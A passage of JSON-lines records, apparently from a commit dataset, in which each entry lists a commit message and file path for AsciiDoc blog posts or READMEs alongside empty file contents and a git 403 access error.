2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"358a22ffdffe6d3b51d065da7bbc098292ed1941","subject":"Update 2013-09-27-javaee7-api-websocket-html5.adoc","message":"Update 2013-09-27-javaee7-api-websocket-html5.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-09-27-javaee7-api-websocket-html5.adoc","new_file":"_posts\/2013-09-27-javaee7-api-websocket-html5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ab55e6e3912de59c1860764fa459c0944597a24","subject":"y2b create post Mystery Unboxing From Intel","message":"y2b create post Mystery Unboxing From 
Intel","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-18-Mystery-Unboxing-From-Intel.adoc","new_file":"_posts\/2016-07-18-Mystery-Unboxing-From-Intel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7597e197d9c1c079180012fafff3779efe9e679b","subject":"Update 2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","message":"Update 2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","new_file":"_posts\/2017-06-11-J-I-R-A-R-E-S-T-A-P-I-Slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd8ce34f19a7c49e0c1d7f77d042c2f7ac75dced","subject":"y2b create post DON'T Buy The Batband, Unless...","message":"y2b create post DON'T Buy The Batband, Unless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-03-DON'T%20Buy%20The%20Batband%2C%20Unless....adoc","new_file":"_posts\/2017-12-03-DON'T%20Buy%20The%20Batband%2C%20Unless....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"605816467c093fc0881747b6184fae32c857743f","subject":"y2b create post Kindle Fire HD Unboxing (Amazon Kindle Fire HD 7\\","message":"y2b create post Kindle Fire HD Unboxing (Amazon Kindle Fire HD 7\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-14-Kindle-Fire-HD-Unboxing-Amazon-Kindle-Fire-HD-7.adoc","new_file":"_posts\/2012-09-14-Kindle-Fire-HD-Unboxing-Amazon-Kindle-Fire-HD-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edaa9c526c792f0bc20c06c58391e3dec0fe2861","subject":"Planning S4","message":"Planning S4\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c12fc70fe9ece2d87ea3c9a1aeb848e02c6c2095","subject":"Update 2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","message":"Update 
2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_file":"_posts\/2014-03-07-Eclipse-Tips-005-Accelerer-votre-debug-avec-le-step-filtering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc4e600aff2dbd87f82a1f42250fbf9baf7ce9d6","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71f3947d969d9634db49440190543b672de2f160","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8b9fa981fc24e3386a2d2f70886996514b48a6c","subject":"y2b create post Is The LG V30 The Most Underrated Smartphone?","message":"y2b create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-03-IsTheLGV30TheMostUnderratedSmartphone.adoc","new_file":"_posts\/2018-02-03-IsTheLGV30TheMostUnderratedSmartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d88a497571633971a9d6e1bebf35e66cb0b8760","subject":"y2b create post Note 4 Unboxing - Is Gap Gate Real?","message":"y2b create post Note 4 Unboxing - Is Gap Gate Real?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-10-03-Note-4-Unboxing--Is-Gap-Gate-Real.adoc","new_file":"_posts\/2014-10-03-Note-4-Unboxing--Is-Gap-Gate-Real.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edb63d03ab9999274eed74d6f5cae65bcf410184","subject":"Documentation reword on get user","message":"Documentation reword on 
get user\n","repos":"jonrf93\/jtsoluciones,jonrf93\/jtsoluciones,jonrf93\/jtsoluciones,jonrf93\/jtsoluciones","old_file":"jtsoluciones-rest\/src\/main\/resources\/documentation\/index.adoc","new_file":"jtsoluciones-rest\/src\/main\/resources\/documentation\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonrf93\/jtsoluciones.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9d7a81ca1222c2c80858b3b510fbd2b4b51dad7","subject":"Update 2016-04-23-learn-to-code.adoc","message":"Update 2016-04-23-learn-to-code.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-04-23-learn-to-code.adoc","new_file":"_posts\/2016-04-23-learn-to-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fafa254a02f9948cdf4421ed8be798869476d107","subject":"Fix volume paths in README","message":"Fix volume paths in README\n","repos":"redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,BBVA\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"136e73be3154368959eb54a51a8115a4a46f94bd","subject":"Flesh out readme a little","message":"Flesh out readme a little\n\n[skip ci]\n","repos":"lassik\/extract,lassik\/extract","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"4c20a21f3b824635bc23809307357a27e28cff01","subject":"Link to Home Page","message":"Link to Home Page\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"349b4e39945dd88e698a7757cfabb3179964f50d","subject":"Update 2017-04-06-Download-music-using-Scrapy-Python.adoc","message":"Update 2017-04-06-Download-music-using-Scrapy-Python.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-06-Download-music-using-Scrapy-Python.adoc","new_file":"_posts\/2017-04-06-Download-music-using-Scrapy-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f8519ab77360567c91838da0213c6fdf9624d0a","subject":"Update 2018-01-23-GraphQL.adoc","message":"Update 
2018-01-23-GraphQL.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-01-23-GraphQL.adoc","new_file":"_posts\/2018-01-23-GraphQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a409688d3e95917948847e2b80a097dc8185ea6","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"545b30fcdbd75ca381e875850bc906fd3c68c40e","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32d17792d36c564db1ca39b05270b10e5dc68dcf","subject":"Deleted _posts\/2016-12-01-Test.adoc","message":"Deleted _posts\/2016-12-01-Test.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Test.adoc","new_file":"_posts\/2016-12-01-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aef56591ee2a35fd325d2d9343dfccade75652a","subject":"Issue #533 Converted README to asciidoc and cleaned up unnecessary information, updated links","message":"Issue #533 Converted README to asciidoc and cleaned up unnecessary information, updated links\n","repos":"budhrg\/minishift,LalatenduMohanty\/minishift,thatdocslady\/minishift,jimmidyson\/minishift,minishift\/minishift,minishift\/minishift,budhrg\/minishift,budhrg\/minishift,Preeticp\/minishift,jimmidyson\/minishift,LalatenduMohanty\/minishift,praveenkumar\/minishift,minishift\/minishift,jimmidyson\/minishift,Preeticp\/minishift,thatdocslady\/minishift,praveenkumar\/minishift,LalatenduMohanty\/minishift,Preeticp\/minishift,thatdocslady\/minishift,praveenkumar\/minishift","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jimmidyson\/minishift.git\/': The 
requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a61ce1fea31c97db165d92abc968931100fe822c","subject":"Added a link to the license page in the badge","message":"Added a link to the license page in the badge\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21dc41eb0d7bd54bb1a5b989208192ea00822b50","subject":"Remove redundant build instructions from the README","message":"Remove redundant build instructions from the README\n\nChange-Id: Ifc4e8a125e0215f816eafc686b0ac1cbfd4d0d9e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1175\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab98f51a88b1b4c306fe89cf2b8c2f1f2243a08b","subject":"[doc] Fix","message":"[doc] Fix","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb3b2a3bb4cb144623d7349eb7ae71524ae83dcf","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-transform-queryparameters","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-queryparameters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54f7121832e8de781b317fb588a0bd973b32b7d7","subject":"adding comments in README","message":"adding comments in README\n","repos":"corbtastik\/spring-cloud-stream-samples,corbtastik\/spring-cloud-stream-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/corbtastik\/spring-cloud-stream-samples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"0814f72d66600967c9bf5f1c743ce0ee64e5c1f2","subject":"update doc section","message":"update doc section\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"344532d1dbd7c9ad289414df4e55c88718a58ce6","subject":"fixed typo in README","message":"fixed typo in README\n","repos":"flocke\/scripts,flocke\/scripts,flocke\/scripts","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flocke\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"704eea79f118c42c0cc44f2ae0c71322b0ac9bb9","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3da584bda1e99d517858d5b862768e1e2c5b1a1c","subject":"Update 2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","message":"Update 2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","new_file":"_posts\/2016-03-03-Disney-Cruise-Line-to-expand-to-six-ships-by-2023.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03cc0e70d3d9afa518c56e694ece18166e8253ea","subject":"Fix #630","message":"Fix #630\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_file":"fermat-documentation\/technical notes\/Bitcoin configuration\/Local bitcoin environment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef686beff0851ea97f6ce8559a85d991fb27eacf","subject":"Update 2016-07-24-Geneaologia.adoc","message":"Update 2016-07-24-Geneaologia.adoc","repos":"kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm","old_file":"_posts\/2016-07-24-Geneaologia.adoc","new_file":"_posts\/2016-07-24-Geneaologia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/kornel661\/blog-test-jm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0716a8d6cd89ccdbd45fb100b5bf89f7f96211b2","subject":"Update ricka.adoc (#12)","message":"Update ricka.adoc (#12)\n\n* Update ricka.adoc\r\n\r\n* Update ricka.adoc\r\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_team\/ricka.adoc","new_file":"_team\/ricka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c91dadc52bf9b38e2d0d5a84aae5b91df46ef92","subject":"Renamed '_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc' to '_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc'","message":"Renamed '_posts\/2019-08-24-Impossible-Box-de-Mexico.adoc' to '_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc'","repos":"ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io,ImpossibleBlog\/impossibleblog.github.io","old_file":"_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc","new_file":"_posts\/2019-08-24-La-razon-Impossible-Blog-de-Mexico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImpossibleBlog\/impossibleblog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b139cf5565394215ab29324c0ca673a3ba041bf","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"935f4db670c646908916185c1d7fbaafa6a1d193","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92c0fd5444dd6aadd740a05d3ce7c8ba281499e7","subject":"update changelog","message":"update changelog\n","repos":"rumpelsepp\/pynote","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"194a3cdfcec3d1096e87d43dcc457fa6bfb665fa","subject":"Update 2016-07-28-2016-07-27.adoc","message":"Update 
2016-07-28-2016-07-27.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-28-2016-07-27.adoc","new_file":"_posts\/2016-07-28-2016-07-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc8830006f71bd2466da80c042d8ff2386d3c84","subject":"Update 2017-06-19-serposcope.adoc","message":"Update 2017-06-19-serposcope.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-serposcope.adoc","new_file":"_posts\/2017-06-19-serposcope.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f17e6762f2a9a4d1ac22c91387b3c5f84cec8c98","subject":"y2b create post The Most INSANE Dual 75-inch Screen Setup!","message":"y2b create post The Most INSANE Dual 75-inch Screen Setup!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-26-The-Most-INSANE-Dual-75inch-Screen-Setup.adoc","new_file":"_posts\/2017-10-26-The-Most-INSANE-Dual-75inch-Screen-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ecf3e627dff1780ca4fcb4cdc0890e795267cd4","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f4136dc374c076f9d0d698422d95a2fbfeb9bad","subject":"Added Changelog (#2234)","message":"Added Changelog (#2234)\n\n* Add CHANGELOG.adoc\r\n\r\n* Reformat doc\r\n\r\n* Update content for v2.0b1","repos":"robotframework\/RIDE,robotframework\/RIDE,robotframework\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HelioGuilherme66\/RIDE.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83e448fb188a1d30909f349b6e2c782bc7f5f527","subject":"Upgrade README-ja","message":"Upgrade 
